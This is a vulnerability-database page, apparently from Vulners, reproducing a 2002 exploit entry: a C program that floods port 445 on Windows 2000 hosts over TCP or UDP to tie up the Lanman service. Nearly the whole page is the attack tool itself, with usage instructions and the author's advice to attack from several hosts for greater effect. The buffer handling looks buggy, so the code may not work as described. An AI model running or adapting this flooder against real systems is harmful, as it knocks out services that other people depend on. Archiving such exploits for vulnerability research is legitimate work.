Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows Server 2000 - Lanman Denial of Service (1)

🗓️ 17 Apr 2002 00:00:00Reported by Daniel NystromType 
exploitpack
 exploitpack👁 27 Views

Windows 2000 vulnerability allows denial of service via malformed data to port 445, affecting CPU.

Code
// source: https://www.securityfocus.com/bid/4532/info

An issue has been discovered in Windows 2000, which could cause a denial of system services.

Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage. 

/********************************************************
* 	Microsoft Windows 2000 Remote DoS 		*
*	---------------------------------		*
*							*
* Hello :)						*
* This is an DoS exploit that utilizes the flaw found 	*
* by KPMG Denmark, to crasch or hang any Win2k box 	*
* running the LanMan server on port 445 (ms-ds).  	*
* What it does is just a simple 10k NULL string		*
* bombardment of port 445 TCP or UDP.			*
*							*
*			                                *
* By: Daniel Nystrom <[email protected]>		*
* Download: www.telhack.tk / exce.darktech.org		*
*							*
* Suggestions: When performing the attack, use UDP if 	*
*	       you are attacking from a single host. 	*
*	       TCP only eats about 35% CPU on an AMD	*
*	       Athlon XP 1800+ while UDP eats 99%.      *
*	       So if TCP is the only option, use more   *
*	       than one attacking host. All in all this *
*              DoS is "pretty weak" and should be used  *
*              from more than one host in each attack   *
*              to get the best result.                  *
*							*
* Compiles on: Linux (Debian 2.2r6 and RH 7.3 tested).  *
*              Should compile on other *nix's as well.  *
*							*
* Thanks: Peter Grundl, for answering my Q's :)         *
*							*
* greets: xenogen, ifa-, zeromatic, RTJ, all@telhack    *
*							*
********************************************************/

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define MICROSOFT_DS_PORT 445

unsigned long resolveTarget(char nstarget[]);


int main(int argc, char *argv[])
{
        int sock;
	int count;
	struct sockaddr_in target;
	unsigned short port = MICROSOFT_DS_PORT;
	char *nullbuffer;


	printf("%c[41m", 0x1B);
	fprintf(stdout, "\n--[ excE's Remote Microsoft Windows 2000 DoS (microsoft-ds)\n"); 
	printf("%c[0m", 0x1B);
	fprintf(stdout, "-----------------------------------------------------------\n");

        if(argc != 4)
        {
                fprintf(stderr, "--[ Invalid number of parameters!\n");
                fprintf(stderr, "--[ Usage: %s <Server IP> <TCP/UDP> <Send Count>\n", argv[0]);
                fprintf(stderr, "--[ Forex: %s 127.0.0.1 UDP 10000\n\n", argv[0]);
                exit(-1);
        }

	nullbuffer = (char *) malloc(10*1024*sizeof(char));
	bzero(nullbuffer,sizeof(nullbuffer));
	
	fprintf(stdout, "--[ Starting attack on %s...\n", argv[1]);

	memset(&target, 0, sizeof(target));
	target.sin_family 	= AF_INET;
	target.sin_addr.s_addr 	= resolveTarget(argv[1]);
	target.sin_port		= htons(port);


	if(argv[2][0] == 'U')
	{
		if((sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		{
			perror("socket() failed ");
			exit(-1);
		}
	
		fprintf(stdout, "--[ Sending NULL byte string * %d via UDP\n", atoi(argv[3]));

		for(count=0;count<atoi(argv[3]);count++)
		{
		    if(sendto(sock, nullbuffer, strlen(nullbuffer), 0, (struct sockaddr *) &target, sizeof(target)) != strlen(nullbuffer))
		    {
				perror("sendto() failed ");
				exit(-1);
		    } else { printf("."); } 
		}
		close(sock);
		printf("\n");
	}
	 else if(argv[2][0] == 'T')
	{
		
		fprintf(stdout, "--[ Connecting and sending NULL byte string * %d...\n", atoi(argv[3]));
		 
		if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
		{
			perror("socket() failed ");
			exit(-1);
		}

		if(connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0)
		{
			perror("connect() failed ");
			exit(-1);
		}

		for(count=0;count<atoi(argv[3]);count++)
		{ 
			if(send(sock, nullbuffer, strlen(nullbuffer), 0) != strlen(nullbuffer))
			{
				perror("send() failed ");
				exit(-1);
			} else { printf("."); }

		}
		close(sock);
		printf("\n");
	} else
	{
		fprintf(stderr, "--[ Error: You must define a protocol (TCP or UDP)\n\n");
		exit(-1);
	}

	fprintf(stdout, "--[ Finished flooding target!\n");
	fprintf(stdout, "--[ http://www.telhack.tk\n");
	
	return 0;
}

unsigned long resolveTarget(char nstarget[])
{
	struct hostent *targetname;

	if((targetname=gethostbyname(nstarget)) == NULL)
	{
		fprintf(stderr, "--[ Name lookup failed. Please enter a valid IP or hostname\n");
		exit(-1);
	}

	return *((unsigned long *) targetname->h_addr_list[0]);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Apr 2002 00:00Current
7.3High risk
Vulners AI Score7.3
windows 2000denial of servicelanman serviceport 445high cpu usagemalformed data
27